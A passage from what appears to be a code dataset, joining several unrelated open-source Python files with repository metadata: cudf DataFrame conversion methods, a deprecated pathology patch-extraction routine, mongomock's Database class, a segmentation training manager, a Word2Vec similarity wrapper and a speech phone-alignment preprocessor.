offsets = _gdf.hash_partition(cols, key_indices, nparts, outputs)
# Re-construct output partitions
outdf = DataFrame()
for k, col in zip(self._cols, outputs):
outdf[k] = col
# Slice into partition
return [outdf[s:e] for s, e in zip(offsets, offsets[1:] + [None])]
def to_pandas(self):
"""
Convert to a Pandas DataFrame.
Examples
--------
.. code-block:: python
from cudf.dataframe import DataFrame
a = ('a', [0, 1, 2])
b = ('b', [-3, 2, 0])
df = DataFrame([a, b])
pdf = df.to_pandas()
type(pdf)
Output:
.. code-block:: python
<class 'pandas.core.frame.DataFrame'>
"""
index = self.index.to_pandas()
data = {c: x.to_pandas(index=index) for c, x in self._cols.items()}
return pd.DataFrame(data, columns=list(self._cols), index=index)
@classmethod
def from_pandas(cls, dataframe, nan_as_null=True):
"""
Convert from a Pandas DataFrame.
Raises
------
TypeError for invalid input type.
Examples
--------
.. code-block:: python
import cudf
import pandas as pd
data = [[0,1], [1,2], [3,4]]
pdf = pd.DataFrame(data, columns=['a', 'b'], dtype=int)
cudf.dataframe.DataFrame.from_pandas(pdf)
Output:
.. code-block:: python
<cudf.DataFrame ncols=2 nrows=3 >
"""
if not isinstance(dataframe, pd.DataFrame):
raise TypeError('not a pandas.DataFrame')
df = cls()
# Set columns
for colk in dataframe.columns:
df[colk] = Series(dataframe[colk].values, nan_as_null=nan_as_null)
# Set index
return df.set_index(dataframe.index.values)
def to_arrow(self, index=True):
"""
Convert to a PyArrow Table.
Examples
--------
.. code-block:: python
from cudf.dataframe import DataFrame
a = ('a', [0, 1, 2])
b = ('b', [-3, 2, 0])
df = DataFrame([a, b])
df.to_arrow()
Output:
.. code-block:: python
pyarrow.Table
None: int64
a: int64
b: int64
"""
arrays = []
names = []
if index:
names.append(self.index.name)
arrays.append(self.index.to_arrow())
for name, column in self._cols.items():
names.append(name)
arrays.append(column.to_arrow())
return pa.Table.from_arrays(arrays, names=names)
@classmethod
def from_arrow(cls, table):
"""Convert from a PyArrow Table.
Raises
------
TypeError for invalid input type.
**Notes**
Does not support automatically setting index column(s) similar to how
``to_pandas`` works for PyArrow Tables.
Examples
--------
.. code-block:: python
import pyarrow as pa
from cudf.dataframe import DataFrame
data = [pa.array([1, 2, 3]), pa.array([4, 5, 6])
batch = pa.RecordBatch.from_arrays(data, ['f0', 'f1'])
table = pa.Table.from_batches([batch])
DataFrame.from_arrow(table)
Output:
.. code-block:: python
<cudf.DataFrame ncols=2 nrows=3 >
"""
if not isinstance(table, pa.Table):
raise TypeError('not a pyarrow.Table')
df = cls()
for col in table.columns:
if len(col.data.chunks) != 1:
raise NotImplementedError("Importing from PyArrow Tables "
"with multiple chunks is not yet "
"supported")
df[col.name] = col.data.chunk(0)
return df
def to_records(self, index=True):
"""Convert to a numpy recarray
Parameters
----------
index : bool
Whether to include the index in the output.
Returns
-------
numpy recarray
"""
members = [('index', self.index.dtype)] if index else []
members += [(col, self[col].dtype) for col in self.columns]
dtype = np.dtype(members)
ret = np.recarray(len(self), dtype=dtype)
if index:
ret['index'] = self.index.values
for col in self.columns:
ret[col] = self[col].to_array()
return ret
@classmethod
def from_records(self, data, index=None, columns=None, nan_as_null=False):
"""Convert from a numpy recarray or structured array.
Parameters
----------
data : numpy structured dtype or recarray
index : str
The name of the index column in *data*.
If None, the default index is used.
columns : list of str
List of column names to include.
Returns
-------
DataFrame
"""
names = data.dtype.names if columns is None else columns
df = DataFrame()
for k in names:
# FIXME: unnecessary copy
df[k] = Series(np.ascontiguousarray(data[k]),
nan_as_null=nan_as_null)
if index is not None:
indices = data[index]
return df.set_index(indices.astype(np.int64))
return df
def quantile(self, q, interpolation='linear', exact=False):
"""
Return values at the given quantile.
Parameters
----------
q : float or array-like
0 <= q <= 1, the quantile(s) to compute
interpolation : {`linear`, `lower`, `higher`, `midpoint`, `nearest`}
This parameter specifies the interpolation method to use,
when the desired quantile lies between two data points i and j.
Default 'linear'.
columns : list of str
List of column names to include.
exact : boolean
Whether to use approximate or exact quantile algorithm.
Returns
-------
DataFrame
"""
result = DataFrame()
result['Quantile'] = q
for k, col in self._cols.items():
result[k] = col.quantile(q, interpolation, exact,
quant_index=False)
print(result)
class Loc(object):
"""
For selection by label.
"""
def __init__(self, df):
self._df = df
def __getitem__(self, arg):
if isinstance(arg, tuple):
row_slice, col_slice = arg
elif isinstance(arg, slice):
row_slice = arg
col_slice = self._df.columns
else:
raise TypeError(type(arg))
df = DataFrame()
begin, end = self._df.index.find_label_range(row_slice.start,
row_slice.stop)
for col in col_slice:
sr = self._df[col]
df.add_column(col, sr[begin:end], forceindex=True)
return df
register_distributed_serializer(DataFrame)
| 31.655354 | 84 | 0.511488 |
7531acf352e8987d94ac5c56b1c380105d4df383 | 10,302 | py | Python | deprecated_work/deprecated.py | sumanthratna/PathFlowAI | 70324e78da7ad9452789478b9be7cc76515ea3ab | [
"MIT"
] | null | null | null | deprecated_work/deprecated.py | sumanthratna/PathFlowAI | 70324e78da7ad9452789478b9be7cc76515ea3ab | [
"MIT"
] | null | null | null | deprecated_work/deprecated.py | sumanthratna/PathFlowAI | 70324e78da7ad9452789478b9be7cc76515ea3ab | [
"MIT"
] | null | null | null | def extract_patch_info(
basename,
input_dir="./",
annotations=[],
threshold=0.5,
patch_size=224,
generate_finetune_segmentation=False,
target_class=0,
intensity_threshold=100.0,
target_threshold=0.0,
):
# from collections import OrderedDict
# annotations=OrderedDict(annotations)
# from dask.multiprocessing import get
# import time
from dask import dataframe as dd
import dask.delayed
import multiprocessing
from shapely.ops import unary_union
from shapely.geometry import MultiPolygon
from itertools import product
from os.path import join
import numpy as np
from pathflowai.utils import (
load_dataset,
npy2da,
create_purple_mask,
is_coords_in_box,
is_valid_patch,
)
import pandas as pd
arr, masks = load_dataset(
join(input_dir, "{}.zarr".format(basename)),
join(input_dir, "{}_mask.pkl".format(basename)),
)
if "annotations" in masks:
segmentation = True
if generate_finetune_segmentation:
segmentation_mask = npy2da(join(input_dir, "{}_mask.npy".format(basename)))
else:
segmentation = False
# masks=np.load(masks['annotations'])
# npy_file = join(input_dir,'{}.npy'.format(basename))
purple_mask = create_purple_mask(arr)
x_max = float(arr.shape[0])
y_max = float(arr.shape[1])
x_steps = int((x_max - patch_size) / patch_size)
y_steps = int((y_max - patch_size) / patch_size)
for annotation in annotations:
try:
masks[annotation] = (
[unary_union(masks[annotation])] if masks[annotation] else []
)
except:
masks[annotation] = (
[MultiPolygon(masks[annotation])] if masks[annotation] else []
)
# @pysnooper.snoop("process_line.log")
def return_line_info(row):
xs = row["x"]
ys = row["y"]
xf = xs + patch_size
yf = ys + patch_size
print(basename, xs, ys)
# if is_valid_patch((purple_mask[xs:xf,ys:yf]>=intensity_threshold).compute(), threshold):#.compute()
# print(xs,ys, 'valid_patch')
if segmentation:
row["annotation"] = "segment"
# info=[basename,xs,ys,patch_size,'segment']
seg = segmentation_mask[xs:xf, ys:yf].compute()
# info=info+
row.iloc[-target_class:] = [(seg == i).mean() for i in range(target_class)]
# if generate_finetune_segmentation:
else:
row.iloc[-len(annotations) :] = [
is_coords_in_box(
coords=np.array([xs, ys]),
patch_size=patch_size,
boxes=masks[annotation],
)
for annotation in annotations
]
row["annotation"] = annotations[
row.iloc[-len(annotations) :].argmax()
] # [np.argmax(annotation_areas)]
# info=[basename,xs,ys,patch_size,main_annotation]+annotation_areas
# else:
# if segmentation:
# info = [basename, xs, ys, patch_size, 'NA'] + \
# [0. for i in range(target_class)]
# else:
# info = [basename, xs, ys, patch_size, 'NA'] + \
# [0. for i in range(len(annotations))]
return row # info
def seg_line(xs, ys, patch_size, segmentation_mask, target_class):
xf = xs + patch_size
yf = ys + patch_size
seg = segmentation_mask[xs:xf, ys:yf]
return [(seg == i).mean() for i in range(target_class)]
def annot_line(xs, ys, patch_size, masks, annotations):
return [
is_coords_in_box(
coords=np.array([xs, ys]),
patch_size=patch_size,
boxes=masks[annotation],
)
for annotation in annotations
]
patch_info = pd.DataFrame(
[
(
[basename, i * patch_size, j * patch_size, patch_size, "NA"]
+ [0.0] * (target_class if segmentation else len(annotations))
)
for i, j in product(range(x_steps + 1), range(y_steps + 1))
],
columns=(
["ID", "x", "y", "patch_size", "annotation"]
+ (
annotations
if not segmentation
else list([str(i) for i in range(target_class)])
)
),
) # [dask.delayed(return_line_info)(i,j) for (i,j) in product(range(x_steps+1),range(y_steps+1))]
valid_patches = []
for xs, ys in patch_info[["x", "y"]].values.tolist():
valid_patches.append(
dask.delayed(is_valid_patch)(
xs, ys, patch_size, purple_mask, intensity_threshold, threshold
)
)
patch_info = patch_info.loc[np.array(dask.compute(valid_patches))]
area_info = []
if segmentation:
patch_info.loc[:, "annotation"] = "segment"
for xs, ys in patch_info[["x", "y"]].values.tolist():
area_info.append(
dask.delayed(seg_line)(
xs, ys, patch_size, segmentation_mask, target_class
)
)
else:
for xs, ys in patch_info[["x", "y"]].values.tolist():
area_info.append(
[
dask.delayed(is_coords_in_box)(
xs, ys, patch_size, masks, annotation
)
for annotation in annotations
]
)
patch_info.iloc[:, 6:] = np.array(dask.compute(area_info))
annot = list(patch_info.iloc[:, 6:])
patch_info.loc[:, "annotation"] = np.vectorize(
lambda i: annot[patch_info.iloc[i, 6:].argmax()]
)(
np.arange(patch_info.shape[0])
) # patch_info[np.arange(target_class).astype(str).tolist()].values.argmax(1).astype(str)
if 0:
patch_info = dd.from_pandas(
patch_info, npartitions=2 * multiprocessing.cpu_count()
)
meta_info = [
("ID", str),
("x", int),
("y", int),
("patch_size", int),
("annotation", str),
] + (
[(annotation, np.float) for annotation in annotations]
if not segmentation
else list([(str(i), np.float) for i in range(target_class)])
)
# patch_info = dd.from_delayed(patch_info,meta=meta_info).compute()
patch_info = patch_info.map_partitions(
lambda df: df.apply(return_line_info, axis=1), meta=meta_info
).compute(
scheduler="processes"
) # .values
# patch_info=patch_info.apply(return_line_info,axis=1)
patch_info = patch_info.loc[patch_info["annotation"] != "NA"]
if segmentation:
a = 1
if 0:
patch_info = dd.from_pandas(
patch_info, npartitions=2 * multiprocessing.cpu_count()
)
meta_info = [
("ID", str),
("x", int),
("y", int),
("patch_size", int),
("annotation", str),
] + (
[(annotation, np.float) for annotation in annotations]
if not segmentation
else list([(str(i), np.float) for i in range(target_class)])
)
# patch_info = dd.from_delayed(patch_info,meta=meta_info).compute()
patch_info = patch_info.map_partitions(
lambda df: df.apply(return_line_info, axis=1), meta=meta_info
).compute(
scheduler="processes"
) # .values
# patch_info=patch_info.apply(return_line_info,axis=1)
patch_info = patch_info.loc[patch_info["annotation"] != "NA"]
if segmentation:
a = 1
if 0:
from parallel_utils import extract_patch_info
patch_info = extract_patch_info(
basename,
input_dir,
annotations,
threshold,
patch_size,
generate_finetune_segmentation,
target_class,
intensity_threshold,
target_threshold,
)
# @pysnooper.snoop("process_line.log")
def return_line_info(row):
xs = row["x"]
ys = row["y"]
xf = xs + patch_size
yf = ys + patch_size
print(basename, xs, ys)
# if is_valid_patch((purple_mask[xs:xf,ys:yf]>=intensity_threshold).compute(), threshold):#.compute()
# print(xs,ys, 'valid_patch')
if segmentation:
row["annotation"] = "segment"
# info=[basename,xs,ys,patch_size,'segment']
seg = segmentation_mask[xs:xf, ys:yf].compute()
# info=info+
row.iloc[-target_class:] = [(seg == i).mean() for i in range(target_class)]
# if generate_finetune_segmentation:
else:
row.iloc[-len(annotations) :] = [
is_coords_in_box(
coords=np.array([xs, ys]),
patch_size=patch_size,
boxes=masks[annotation],
)
for annotation in annotations
]
row["annotation"] = annotations[
row.iloc[-len(annotations) :].argmax()
] # [np.argmax(annotation_areas)]
# info=[basename,xs,ys,patch_size,main_annotation]+annotation_areas
# else:
# if segmentation:
# info = [basename, xs, ys, patch_size, 'NA'] + \
# [0. for i in range(target_class)]
# else:
# info = [basename, xs, ys, patch_size, 'NA'] + \
# [0. for i in range(len(annotations))]
return row # info
def seg_line(xs, ys, patch_size, segmentation_mask, target_class):
xf = xs + patch_size
yf = ys + patch_size
seg = segmentation_mask[xs:xf, ys:yf]
return [(seg == i).mean() for i in range(target_class)]
def annot_line(xs, ys, patch_size, masks, annotations):
return [
is_coords_in_box(
coords=np.array([xs, ys]),
patch_size=patch_size,
boxes=masks[annotation],
)
for annotation in annotations
]
| 36.147368 | 109 | 0.540478 |
a9de9895fb4cc27a494d724a2d9b9ae2e348f06d | 7,550 | py | Python | mongomock/database.py | ymoran00/mongomock | c580df1455f065114bc1ac057f10414e91d95b73 | [
"BSD-3-Clause"
] | null | null | null | mongomock/database.py | ymoran00/mongomock | c580df1455f065114bc1ac057f10414e91d95b73 | [
"BSD-3-Clause"
] | null | null | null | mongomock/database.py | ymoran00/mongomock | c580df1455f065114bc1ac057f10414e91d95b73 | [
"BSD-3-Clause"
] | null | null | null | import warnings
from . import CollectionInvalid
from . import InvalidName
from . import OperationFailure
from .collection import Collection
from mongomock import read_preferences
from mongomock import store
from six import string_types
try:
from bson import codec_options as bson_codec_options
from pymongo import ReadPreference
_READ_PREFERENCE_PRIMARY = ReadPreference.PRIMARY
except ImportError:
_READ_PREFERENCE_PRIMARY = read_preferences.PRIMARY
bson_codec_options = None
class Database(object):
def __init__(self, client, name, _store, read_preference=None):
self.name = name
self._client = client
self._collection_accesses = {}
self._store = _store or store.DatabaseStore()
self._read_preference = read_preference or _READ_PREFERENCE_PRIMARY
def __getitem__(self, coll_name):
return self.get_collection(coll_name)
def __getattr__(self, attr):
if attr.startswith('_'):
raise AttributeError(
"%s has no attribute '%s'. To access the %s collection, use database['%s']." %
(self.__class__.__name__, attr, attr, attr))
return self[attr]
def __repr__(self):
return "Database({0}, '{1}')".format(self._client, self.name)
@property
def client(self):
return self._client
@property
def read_preference(self):
return self._read_preference
@property
def codec_options(self):
if not bson_codec_options:
raise NotImplementedError(
'The codec options are not implemented in mongomock alone, you need to import '
'the pymongo library as well.')
return bson_codec_options.CodecOptions()
def _get_created_collections(self):
return self._store.list_created_collection_names()
def collection_names(self, include_system_collections=True, session=None):
warnings.warn('collection_names is deprecated. Use list_collection_names instead.')
if include_system_collections:
return list(self._get_created_collections())
return self.list_collection_names(session=session)
def list_collection_names(self, session=None):
if session:
raise NotImplementedError('Mongomock does not handle sessions yet')
return [
name for name in self._get_created_collections()
if not name.startswith('system.')
]
def get_collection(self, name, codec_options=None, read_preference=None,
write_concern=None, read_concern=None):
if read_concern:
raise NotImplementedError('Mongomock does not handle read_concern yet')
if read_preference is not None:
read_preferences.ensure_read_preference_type('read_preference', read_preference)
try:
return self._collection_accesses[name]
except KeyError:
collection = self._collection_accesses[name] = Collection(
self, name=name, write_concern=write_concern,
read_preference=read_preference or self.read_preference,
_db_store=self._store)
return collection
def drop_collection(self, name_or_collection, session=None):
if session:
raise NotImplementedError('Mongomock does not handle sessions yet')
if isinstance(name_or_collection, Collection):
name_or_collection._store.drop()
else:
self._store[name_or_collection].drop()
def _ensure_valid_collection_name(self, name):
# These are the same checks that are done in pymongo.
if not isinstance(name, string_types):
raise TypeError('name must be an instance of basestring')
if not name or '..' in name:
raise InvalidName('collection names cannot be empty')
if name[0] == '.' or name[-1] == '.':
raise InvalidName("collection names must not start or end with '.'")
if '$' in name:
raise InvalidName("collection names must not contain '$'")
if '\x00' in name:
raise InvalidName('collection names must not contain the null character')
def create_collection(self, name, **kwargs):
self._ensure_valid_collection_name(name)
if name in self.list_collection_names():
raise CollectionInvalid('collection %s already exists' % name)
if kwargs:
raise NotImplementedError('Special options not supported')
self._store.create_collection(name)
return self[name]
def rename_collection(self, name, new_name, dropTarget=False):
"""Changes the name of an existing collection."""
self._ensure_valid_collection_name(new_name)
# Reference for server implementation:
# https://docs.mongodb.com/manual/reference/command/renameCollection/
if not self._store[name].is_created:
raise OperationFailure(
'The collection "{0}" does not exist.'.format(name), 10026)
if new_name in self._store:
if dropTarget:
self.drop_collection(new_name)
else:
raise OperationFailure(
'The target collection "{0}" already exists'.format(new_name),
10027)
self._store.rename(name, new_name)
return {'ok': 1}
def dereference(self, dbref, session=None):
if session:
raise NotImplementedError('Mongomock does not handle sessions yet')
if not hasattr(dbref, 'collection') or not hasattr(dbref, 'id'):
raise TypeError('cannot dereference a %s' % type(dbref))
if dbref.database is not None and dbref.database != self.name:
raise ValueError('trying to dereference a DBRef that points to '
'another database (%r not %r)' % (dbref.database,
self.name))
return self[dbref.collection].find_one({'_id': dbref.id})
def command(self, command, **unused_kwargs):
if isinstance(command, string_types):
command = {command: 1}
if 'ping' in command:
return {'ok': 1.}
# TODO(pascal): Differentiate NotImplementedError for valid commands
# and OperationFailure if the command is not valid.
raise NotImplementedError(
'command is a valid Database method but is not implemented in Mongomock yet')
def with_options(
self, codec_options=None, read_preference=None, write_concern=None, read_concern=None):
if codec_options:
if not bson_codec_options:
raise NotImplementedError(
'The codec options are not implemented in mongomock alone, you need to import '
'the pymongo library as well.')
if codec_options != bson_codec_options.CodecOptions():
raise NotImplementedError('The codec options are not implemented yet')
if write_concern:
raise NotImplementedError(
'write_concern is a valid parameter for with_options but is not implemented yet in '
'mongomock')
if read_concern:
raise NotImplementedError(
'read_concern is a valid parameter for with_options but is not implemented yet in'
'mongomock')
return Database(
self._client, self.name, self._store, read_preference=self.read_preference)
| 39.94709 | 100 | 0.644503 |
bc1e2326a0a5b0e7a40bf78b903c703904993ebb | 3,362 | py | Python | GraduationDesign/SSFN_V5/Word2Vec.py | sivanWu0222/GraduationProject | 3f98d078b763dd84a246999879040c34cfbc5efb | [
"MIT"
] | 12 | 2019-04-27T11:17:16.000Z | 2022-02-27T14:03:12.000Z | GraduationDesign/SSFN_V5/Word2Vec.py | sivanWu0222/GraduationProject | 3f98d078b763dd84a246999879040c34cfbc5efb | [
"MIT"
] | 1 | 2022-03-21T12:31:29.000Z | 2022-03-26T03:01:14.000Z | GraduationDesign/SSFN_V5/Word2Vec.py | sivanWu0222/GraduationProject | 3f98d078b763dd84a246999879040c34cfbc5efb | [
"MIT"
] | null | null | null | from gensim.models import KeyedVectors
class Word2Vec():
def __init__(self, modelPath, kind='bin'):
"""
创建Word2Vec对象
modelPath: 模型路径
kind: 模型类型
bin: 二进制文件
txt: 文本文件
return: 无
"""
if kind != 'bin':
kind = False
else:
kind = True
print('loading word2vector model...')
self.model = KeyedVectors.load_word2vec_format(modelPath, binary=kind, unicode_errors='ignore')
def get_word_vector(self, word):
"""
获得词向量
word: 词语
return: 词向量
"""
if word in self.model:
return self.model[word]
return None
def word_similarity(self, word1, word2):
"""
计算词语相似度
word1: 词语1
word2: 词语2
return: 词语1与词语2的相似度
"""
if word1 not in self.model or word2 not in self.model:
return 0
return self.model.similarity(word1, word2)
def get_similar_Words(self, word, maxReturnNum):
"""
获得语义相似的词语
word: 词语
maxReturnNum: 最大返回词语数量
return: 词语及相似度 [(word, simi)...]
"""
if word not in self.model:
return None
return self.model.similar_by_word(word, topn=maxReturnNum)
def __cal_max_similarity(self, centerWord, wordList):
"""
计算词语与词语列表中词语的最大相似度
centerWord: 词语
wordList: 词语列表
return: 词语与词语列表中词语的最大相似度
"""
maxSimi = -1
if centerWord in wordList:
return 1
else:
for word in wordList:
temp = self.word_similarity(centerWord, word)
if temp == 0: continue
if temp > maxSimi: maxSimi = temp
if maxSimi == -1: return 0
return maxSimi
def sentence_similarity(self, sentence1Words, sentence2Words):
"""
计算句子相似度
sentence1Words: 句子1词语列表
sentence2Words: 句子2词语列表
return: 两个句子的相似度
"""
if len(sentence1Words) == 0 or len(sentence2Words) == 0:
return 0
vector1 = [self.__cal_max_similarity(word, sentence2Words) for word in sentence1Words]
vector2 = [self.__cal_max_similarity(word, sentence1Words) for word in sentence2Words]
return (sum(vector1) + sum(vector2)) / (len(vector1) + len(vector2))
def sentence_weight_similarity(self, sentence1Words, sentence2Words, weightVector1, weightVector2):
"""
计算句子相似度(带权值)
每一个词语都有一个对应的权值
sentence1Words: 句子1词语列表
sentence2Words: 句子2词语列表
weightVector1: 句子1权值向量
weightVector2: 句子2权值向量
return: 两个句子的相似度
"""
if len(sentence1Words) == 0 or len(sentence2Words) == 0:
return 0
if len(sentence1Words) != len(weightVector1) or len(sentence2Words) != len(weightVector2):
raise Exception('length of word list and weight vector is different')
vector1 = [self.__cal_max_similarity(word, sentence2Words) * weight for word, weight in
zip(sentence1Words, weightVector1)]
vector2 = [self.__cal_max_similarity(word, sentence1Words) * weight for word, weight in
zip(sentence2Words, weightVector2)]
return (sum(vector1) + sum(vector2)) / (sum(weightVector1) + sum(weightVector2)) | 28.982759 | 103 | 0.582689 |
d75a2ae0a72dcd116d32dd579263f6b4afa25e2c | 303 | py | Python | rss/setup.py | yxy1996/ros-wifi-localization | 891b67dfd162708201e0347a7f757093a7553348 | [
"BSD-3-Clause"
] | 25 | 2018-04-27T22:04:27.000Z | 2022-03-14T20:50:45.000Z | rss/setup.py | yxy1996/ros-wifi-localization | 891b67dfd162708201e0347a7f757093a7553348 | [
"BSD-3-Clause"
] | 3 | 2018-04-23T12:00:04.000Z | 2021-08-20T02:00:12.000Z | rss/setup.py | yxy1996/ros-wifi-localization | 891b67dfd162708201e0347a7f757093a7553348 | [
"BSD-3-Clause"
] | 7 | 2019-06-19T17:36:34.000Z | 2021-09-07T13:59:11.000Z | ## ! DO NOT MANUALLY INVOKE THIS setup.py, USE CATKIN INSTEAD
from distutils.core import setup
from catkin_pkg.python_setup import generate_distutils_setup
# fetch values from package.xml
setup_args = generate_distutils_setup(
packages=['rss'],
package_dir={'': 'src'},
)
setup(**setup_args)
| 23.307692 | 61 | 0.755776 |
25c77d6239164b01491d8e551234d6cf9e5f9140 | 5,534 | py | Python | preprocess_alignment.py | andi611/Mockingjay-Speech-Representation | 8f41f5728bdb94497e939fee0d67c7f65729a035 | [
"MIT"
] | 105 | 2019-10-24T05:28:57.000Z | 2022-02-21T23:08:07.000Z | preprocess_alignment.py | aviasd/Mockingjay-Speech-Representation | c01aef3f98bbb3fd4b0fc1b61e77fb5d02a0e453 | [
"MIT"
] | 9 | 2020-02-17T06:39:53.000Z | 2022-03-14T08:46:35.000Z | preprocess_alignment.py | aviasd/Mockingjay-Speech-Representation | c01aef3f98bbb3fd4b0fc1b61e77fb5d02a0e453 | [
"MIT"
] | 19 | 2019-10-29T11:40:34.000Z | 2021-11-24T16:36:04.000Z | # -*- coding: utf-8 -*- #
"""*********************************************************************************************"""
# FileName [ preprocess_alignment.py ]
# Synopsis [ preprocess phone alignment for the LibriSpeech dataset ]
# Author [ Andy T. Liu (Andi611) ]
# Copyright [ Copyleft(c), Speech Lab, NTU, Taiwan ]
# Reference [ https://github.com/BogiHsu/Phone-Recognizer/blob/815cf9375045c053fa57d17fad0fa14fdc3c7bee/loader.py#L28 ]
"""*********************************************************************************************"""
###############
# IMPORTATION #
###############
import os
import pickle
import argparse
import numpy as np
import pandas as pd
from tqdm import tqdm
from pathlib import Path
from utility.audio import sample_rate, _stft_parameters
#############################
# PREPROCESS CONFIGURATIONS #
#############################
def get_preprocess_args():
parser = argparse.ArgumentParser(description='preprocess arguments for LibriSpeech dataset.')
parser.add_argument('--data_path', default='./data/libri_alignment', type=str, help='Path to raw LibriSpeech alignment')
parser.add_argument('--output_path', default='./data/libri_phone', type=str, help='Path to store output', required=False)
args = parser.parse_args()
return args
####################
# PHONE PREPROCESS #
####################
def phone_preprocess(data_path, output_path, sets, unaligned):
print('Data sets :')
for idx, s in enumerate(sets):
print('\t', idx, ':', s)
todo_sets = input('Please enter the index for preprocessing sets (seperate w/ space): ')
sets = [sets[int(s)] for s in todo_sets.split(' ')]
# compute phone2idx
idx = 0
phone2idx = {}
for s in sets:
print('')
print('Computing', s, 'data...')
for path in tqdm(list(Path(os.path.join(data_path, s)).rglob("*.txt"))):
check_name = path.as_posix().split('/')[-1].split('.')[0]
if check_name not in unaligned and check_name != 'unaligned': # ignore the unaligned files and `unaligned.txt` itself
for line in open(path).readlines():
phone = line.strip('\n').split(' ')[-1]
if phone not in phone2idx:
phone2idx[phone] = idx
idx += 1
print('Phone set:')
print(phone2idx)
print(len(phone2idx), 'distinct phones found in', sets)
with open(os.path.join(output_path, 'phone2idx.pkl'), "wb") as fp:
pickle.dump(phone2idx, fp)
for s in sets:
print('')
print('Preprocessing', s, 'data...')
todo = list(Path(os.path.join(data_path, s)).rglob("*.txt"))
print(len(todo),'audio files found in', s)
if not os.path.exists(os.path.join(output_path, s)):
os.makedirs(os.path.join(output_path, s))
print('Preprocessing phone alignments...', flush=True)
for path in tqdm(todo):
check_name = path.as_posix().split('/')[-1].split('.')[0]
if check_name not in unaligned and check_name != 'unaligned': # ignore the unaligned files and `unaligned.txt` itself
x = []
file = open(path).readlines()
for line in file:
line = line.strip('\n').split(' ')
x += time_to_frame(start_time=float(line[0]), end_time=float(line[1]), phone=phone2idx[line[2]])
x = np.asarray(x)
path_to_save = str(path).replace(data_path.split('/')[-1], output_path.split('/')[-1]).replace('txt', 'pkl')
with open(path_to_save, "wb") as fp:
pickle.dump(x, fp)
print('Phone preprocessing complete!')
#################
# TIME TO FRAME #
#################
def time_to_frame(start_time, end_time, phone):
phones = []
start_time = int(start_time * sample_rate)
end_time = int(end_time * sample_rate)
_, hop_length, win_length = _stft_parameters(sample_rate=sample_rate)
h_window = win_length * 0.5 # select the middle of a window
start_time = (start_time - h_window) if start_time >= h_window else 0
end_time = (end_time - h_window) if end_time >= h_window else 0
times = (end_time // hop_length) - (start_time // hop_length) \
+ (1 if start_time % hop_length == 0 else 0) - (1 if end_time % hop_length == 0 else 0)
phones += [phone] * int(times)
return phones
########
# MAIN #
########
def main():
# get arguments
args = get_preprocess_args()
# mkdir
if not os.path.exists(args.output_path):
os.makedirs(args.output_path)
# dump unaligned text
try:
file = open(os.path.join(args.data_path, 'train-clean-360/unaligned.txt')).readlines()
unaligned = [str(line).split('\t')[0].split(' ')[0] for line in file]
print('Unaligned list: ', unaligned)
unaligned_pkl = ['train-clean-360/' + u + '.npy' for u in unaligned]
with open(os.path.join(args.output_path, 'unaligned.pkl'), "wb") as fp:
pickle.dump(unaligned_pkl, fp)
except:
raise ValueError('Did not find unaligned.txt!')
# Process data
sets = ['train-clean-360', 'test-clean'] # only two sets available for now
# sets = ['train-clean-100','train-clean-360','train-other-500','dev-clean','dev-other','test-clean','test-other']
phone_preprocess(args.data_path, args.output_path, sets, unaligned)
if __name__ == '__main__':
main()
| 38.430556 | 129 | 0.573003 |
b550c0e3a7b2f4bc9917cd5921f9e8dd45643661 | 4,387 | py | Python | code/model/train.py | fegonda/icon_demo | d2d1b0148989187c1433597f9c3ae4357178c082 | [
"MIT"
] | null | null | null | code/model/train.py | fegonda/icon_demo | d2d1b0148989187c1433597f9c3ae4357178c082 | [
"MIT"
] | null | null | null | code/model/train.py | fegonda/icon_demo | d2d1b0148989187c1433597f9c3ae4357178c082 | [
"MIT"
] | null | null | null | #---------------------------------------------------------------------------
# train.py
#
# Author : Felix Gonda
# Date : July 10, 2015
# School : Harvard University
#
# Project : Master Thesis
# An Interactive Deep Learning Toolkit for
# Automatic Segmentation of Images
#
# Summary : This file contains the implementation of a prediction task
# thread. The prediction task is responsible for segmenting
# an entire image based a trained model. It loads the trained
# model from file.
#---------------------------------------------------------------------------
import os
import sys
import signal
import threading
import time
import numpy as np
import mahotas
import theano
import theano.tensor as T
base_path = os.path.dirname(__file__)
sys.path.insert(1,os.path.join(base_path, '../common'))
sys.path.insert(2,os.path.join(base_path, '../database'))
from manager import Manager
from utility import Utility
from paths import Paths
from db import DB
#---------------------------------------------------------------------------
class Training(Manager):
#-------------------------------------------------------------------
# Reads the input image and normalize it. Also creates
# a version of the input image with corner pixels
# mirrored based on the sample size
# arguments: - path : directory path where image is located
# - id : the unique identifier of the image
# - pad : the amount to pad the image by.
# return : returns original image and a padded version
#-------------------------------------------------------------------
def __init__(self):
Manager.__init__( self, 'training' )
self.version = 0
#-------------------------------------------------------------------
# online training
#-------------------------------------------------------------------
def work(self, project):
print 'Training.work...'
if project == None:
return
# Offline training
offline = not self.online
if offline or project.type == 'UNET':
self.model.path = project.path_offline
self.model.train(offline=offline, mean=project.mean, std=project.std)
self.done = True
return
# Online training
if project is None:
#print 'no project...'
return
print 'trainable:', project.isTrainable()
#print 'training......running....'
if not project.isTrainable():
return
# check for new data
'''
if self.dataset.load( project ):
self.model.setTrainingData(
self.dataset.x,
self.dataset.y,
self.dataset.p,
self.dataset.l,
project.learningRate,
project.momentum)
'''
self.dataset.load( project )
#self.dataset.sample()
# cache the dataset
if not self.dataset.valid():
print 'invalid data...'
return
# train the classifier
self.model.train( offline=False, data=self.dataset, mean=project.mean, std=project.std)
#self.test_perf( project )
# save statistics
#self.dataset.save_stats( project )
print 'done:', self.done
def test_perf(self, project):
name = 'train-input_0037.tif'
path = '%s/%s'%(Paths.TrainGrayscale, name)
image = mahotas.imread( path )
image = Utility.normalizeImage( image )
results = self.model.predict( image=image, mean=project.mean, std=project.std, threshold=project.threshold)
n_membrane = len(results[ results == 1 ])
print 'n_membrane:', n_membrane
if n_membrane > 300000:
rev = DB.getRevision( self.model.id )
version = '%d_%d'%(self.version, n_membrane)
self.model.save_t( version )
self.version += 1
manager = None
def signal_handler(signal, frame):
if manager is not None:
manager.shutdown()
if __name__ == '__main__':
Utility.report_status('running training manager', '')
signal.signal(signal.SIGINT, signal_handler)
manager = Training( )
print 'manager:', manager
Manager.start( sys.argv, manager )
| 31.113475 | 115 | 0.530203 |
1086dd793e2b8ea7d9b1e32d68cf275553b03aac | 916 | py | Python | adapo/config.py | michaelimfeld/csgo-server-manager | 06cd883b0f46924f20b7fc48260c0d0cd471d6c9 | [
"MIT"
] | 3 | 2015-11-19T19:52:00.000Z | 2016-03-13T22:53:43.000Z | adapo/config.py | michaelimfeld/adapo | 06cd883b0f46924f20b7fc48260c0d0cd471d6c9 | [
"MIT"
